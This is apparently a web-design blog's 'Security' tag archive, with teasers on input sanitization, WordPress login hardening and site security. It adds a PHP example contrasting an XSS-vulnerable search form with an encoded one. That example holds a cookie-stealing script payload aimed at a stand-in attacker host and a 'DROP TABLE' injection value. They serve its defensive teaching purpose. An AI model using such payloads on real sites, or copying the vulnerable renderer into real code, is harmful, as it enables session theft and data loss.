
Posts Tagged ‘Security’.

We are pleased to present below all posts tagged with ‘Security’.

Keeping Web Users Safe By Sanitizing Input Data

In my last article, I covered several common mistakes that show up in web applications. Of these, the one that causes the most trouble is insufficient input validation and sanitization. In this article, I'm joined by my colleague Peter (evilops) Ellehauge in looking at input filtering in more depth, picking on a few real examples that we've seen around the web. As the examples below show, insufficient input validation can lead to various kinds of code injection, including cross-site scripting (XSS), and in some cases can be used to phish user credentials or spread malware.



To start with, we'll take an example[1] from one of the most discussed websites today: a site that hosts WikiLeaks material. Note that the back-end code presented is not the actual code but our reconstruction of what it is likely to be, based on how the exploit works. The HTML was taken from the site itself. We think it's fair to assume that the back end is written in PHP, as the form's action is index.php.
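As an added example (this is not the mirror site's code, nor the reconstruction the article goes on to give), the stand-alone PHP script below shows the general shape of a reflected XSS bug in an `index.php` search form and the two controls the excerpt names: validation at the input boundary for fields with a known shape, and encoding for the HTML context at the point of output. The parameter names `q` and `page`, the `attacker.example` host and the payload are all constructed for the demonstration.

```php
<?php
// Added example, not the mirror site's real code: a minimal index.php that
// reflects a search term. The vulnerable and hardened renderers sit side by
// side so the single difference, encoding at the point of output, is clear.
declare(strict_types=1);

// VULNERABLE: the raw parameter is concatenated straight into the HTML.
// A value such as  "><script>...</script>  closes the value attribute and
// the input tag, and the remainder runs as script in the visitor's browser.
function render_vulnerable(string $q): string
{
    return '<form action="index.php" method="get">'
         . '<input type="text" name="q" value="' . $q . '">'
         . '<input type="submit" value="Search">'
         . '</form>'
         . '<p>Results for: ' . $q . '</p>';
}

// HARDENED: encode for the HTML context where the value is emitted.
// ENT_QUOTES also encodes single quotes (needed inside single-quoted
// attributes); the charset must match the page's <meta charset>, otherwise
// the browser may decode bytes differently from the filter and bypass it.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_hardened(string $q): string
{
    return '<form action="index.php" method="get">'
         . '<input type="text" name="q" value="' . h($q) . '">'
         . '<input type="submit" value="Search">'
         . '</form>'
         . '<p>Results for: ' . h($q) . '</p>';
}

// Validation belongs at the input boundary, for fields with a known shape.
// Returns null for anything that is not a positive integer, so the caller
// has to handle the bad case instead of passing junk on to a query.
function validate_page($raw): ?int
{
    $n = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $n === false ? null : $n;
}

// Constructed attacker input of the kind the article describes: sends the
// session cookie of anyone who follows a link carrying this q parameter.
$payload = '"><script>location="http://attacker.example/?c="+document.cookie</script>';

// Simulate the request so the file also runs from the CLI:  php index.php
$_GET['q']    = $_GET['q']    ?? $payload;
$_GET['page'] = $_GET['page'] ?? '1; DROP TABLE posts';

$q    = (string) $_GET['q'];
$page = validate_page($_GET['page']) ?? 1;   // bad input falls back to a safe default

echo "--- vulnerable ---\n", render_vulnerable($q), "\n\n";
echo "--- hardened (page {$page}) ---\n", render_hardened($q), "\n";
```

Run it with `php index.php` (or serve it with `php -S localhost:8080` and open `/?q=...`): the first block of output contains a live `<script>` element, the second contains only `&lt;script&gt;` text inside the attribute and paragraph. The point worth remembering is that `h()` is applied where the value is written into HTML, not where it is read; the same `$q` would need a different encoder if it were written into a JavaScript string or a URL.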


Common Security Mistakes in Web Applications

Web application developers today need to be skilled in a multitude of disciplines. It's necessary to build an application that is user friendly, highly performant, accessible and secure, all while it executes partially in an untrusted environment that you, the developer, have no control over. I speak, of course, about the user agent. It is most commonly a web browser, but in reality one never really knows what is on the other end of the HTTP connection.


There are many things to worry about when it comes to security on the Web. Is your site protected against denial of service attacks? Is your user data safe? Can your users be tricked into doing things they would not normally do? Is it possible for an attacker to pollute your database with fake data? Is it possible for an attacker to gain unauthorized access to restricted parts of your site? Unfortunately, unless we're careful with the code we write, the answer to these questions can often be one we'd rather not hear.


What Is The Worst Design or Programming Mistake You’ve Ever Made?

Mistakes are made every day in the design and development world. It’s nothing to be ashamed of; it happens. In fact, mistakes are one of the most powerful learning tools at our disposal. Our mistakes impart important lessons that we carry with us as we continue to hone our skill set. Own your mistakes. Never shy away from them; they are the milestones in our development.


So often we view mistakes negatively and let them get us down. We believe they indicate failure and that our otherwise perfect record will be forever marred. No one is perfect; we all make mistakes. They indicate failure only if we fail to learn from them. The online design and development community is a wonderful resource in this respect. Not only are members open about their mistakes, they share their experiences as learning opportunities for others — this is helpful for those of us who have not yet suffered through the same bumps in the road.

With this in mind, we turned again to our Twitter followers and Facebook fans to find out about the worst design or programming mistakes they have ever made. Now we share them with you, our readers, so that we can all learn from them and avoid making the same mistakes.


10 Useful WordPress Security Tweaks

Security has always been a hot topic. Offline, people buy wired homes, car alarms and gadgets to bring their security to the max. Online, security is important, too, especially for people who make a living from websites and blogs. In this article, we'll show you some useful tweaks to protect your WordPress-powered blog.


When a login to a WordPress blog fails, WordPress tells you what went wrong: it distinguishes an unknown username from an incorrect password for a known one. This is handy if you've forgotten your password, but it is equally handy for someone trying to break into your blog, because it confirms which usernames exist. So, why not prevent WordPress from displaying detailed error messages on failed logins?
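One way to do this, as an added example rather than the article's own snippet, is to hook WordPress's core `login_errors` filter from a theme's `functions.php` or a must-use plugin. The plugin header and the wording of the message are assumptions; `login_errors`, `wp_lostpassword_url()` and `esc_url()` are standard WordPress APIs.

```php
<?php
/*
Plugin Name: Generic Login Errors (added example)
Description: Replace WordPress's detailed login failure messages with one generic message.
*/

// Out of the box, wp-login.php reports "Invalid username" for an unknown
// account and "The password you entered for the username X is incorrect"
// for a known one. That difference lets an attacker enumerate valid
// usernames before starting to guess passwords.
//
// The 'login_errors' core filter receives the HTML of all accumulated
// error messages as one string; whatever the callback returns replaces
// it entirely, so the two cases become indistinguishable to the visitor.
add_filter('login_errors', function ($errors) {
    // Keep the legitimate use case from the article: a real user who has
    // forgotten their password still gets a way to reset it.
    $lost_url = esc_url(wp_lostpassword_url());

    return '<strong>Error:</strong> Login failed. '
         . '<a href="' . $lost_url . '">Lost your password?</a>';
});
```

Drop the file into `wp-content/mu-plugins/` and it is active without any admin step. Two caveats a practitioner would want: the generic message removes one enumeration channel but not others (the default author archive, reached via `?author=1`, still redirects to a URL containing the author's login name), and it does nothing to slow down guessing itself, so pair it with rate limiting or lockout on repeated failures.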


10 Ways To Beef Up Your Website’s Security

Hacker attacks across the web are getting more sophisticated every day, and they have to. As anti-virus protection, firewalls and application updates have improved, hackers who want to stay in business have had to get more creative. They have, responding with increasingly sophisticated attacks that force the online security industry to scramble to keep up.

So how do the hackers stay ahead of the security experts? One reason is obvious: if they didn't, they'd be out of a job. Another is institutional: a lone hacker working in a basement can move faster and experiment more freely than a large software company with release cycles to follow, and is therefore often quicker to come up with an effective new attack.


Getting Started With E-Commerce: Your Options When Selling Online

The world of online sales, whether of products or services, can be daunting at first; the options seem confusing and the information conflicted. Yet as the designer or developer of an online store, you will need to guide your client through the maze of choices in order to get it up and running.

I have developed many e-commerce websites during my career as a Web developer. I've used and modified off-the-shelf software and have also developed custom solutions — so I know from experience that there are a number of important questions to answer before presenting possible solutions to a client. Getting all the pertinent information up front is vital if such a project is to run smoothly, and it can save you from delays during the process. It can also help you advise the client on whether they need a full custom cart or an open-source or off-the-shelf product.


This article sets out some of the questions you should ask your client before putting together a proposal for an e-commerce website. I'll explain the most important things to think about when taking payments and handling credit card data securely. It should give you enough information to guide your client and to look up more detail on the aspects that apply to your particular situation.


Case-Study: Deconstructing Popular Websites

In our past articles, we've experimented with better ways to engage users on web pages with CSS3. We love getting into the nuts and bolts of web design by showing off some nifty coding tricks. In this article we'll take a step back to provide some reasoning for designers to embark on that next redesign.


Great web design is built on a sound understanding of user needs, solid business goals and focused metrics. Learning how to deconstruct a website is an important step in building a plan that aligns the company's vision with the needs of its users. A good review keeps the focus on the profitability of the business.


Web Security: Are You Part Of The Problem?

Website security is an interesting topic and should be high on the radar of anyone who has a Web presence under their control. Ineffective Web security leads to all of the things that make us hate the Web: spam, viruses, identity theft, to name a few.

Web Vulnerabilities Q1/Q2 2009.

The problem with Web security is that, as important as it is, it is also very complex. I am quite sure that some of you reading this are already part of a network of attack computers and that your servers are sending out spam messages without you even knowing it. Your email addresses and passwords have been harvested and resold to people who think you need either a new watch, a male enhancement product or a cheap mortgage. The fact is, you are part of the problem and don't know what you did to cause it.

Disclaimer: the things we'll talk about in this article today won't make you a security expert, just as buying a Swiss Army knife won't make you a locksmith or buying a whip won't make you a lion tamer. The purpose here is to raise awareness and perhaps make some of that security mumbo-jumbo a bit more understandable to you.


Website Maintenance Tips for Front-End Developers

One of the biggest advantages of online media over print is the ability to change, update and enhance content at virtually any time, with virtually no negative side effects. In fact, if a website or web application does not continually offer its users an evolving and growing experience, it will soon become insecure, unusable and out of date.

Have you beautified your code, validated your markup, and made your XHTML more semantic? Have you implemented basic SEO best practices, spell-checked content, and removed legacy code? Have you ensured JavaScript is unobtrusive, applied the principle of graceful degradation, and minimized the use of Flash? If you've done all those things (and possibly more), what comes next? Are there things you can do to improve your site's overall effectiveness beyond those?


In this article, we will discuss ways that web designers and front-end coders can keep their websites relevant, timely, and accessible long after a site's launch. This guide goes beyond simple text and graphic updates, common "best practices" for CSS and XHTML, or other things you might see in a typical website checklist. We'll expand on many of the basics, and provide some effective tips for website maintenance geared towards front-end designers and coders.


Increasing Online Sales: Simple Usability Problems To Avoid

When designing an online store, you have to consider many different types of customers: repeat customers, first-timers, people in a rush, etc. One thing that would help all of them is optimum usability. You can achieve this in a variety of ways, starting with eliminating the most common usability problems from your website. Fixing any one of the following eight common usability problems will get you started on the path to usability and user-experience heaven and, ultimately, more sales.

Get Satisfaction has a prominent search box with a hardly usable drop-down menu. The search box appears only on the front page.

A solid information architecture can do wonders for people who enjoy browsing, but some customers just want to find what they're looking for, buy it and get out. These people are search dominant, and as soon as they land on your website, they will start searching. And if they can't find your search box, they will leave. As simple as that.

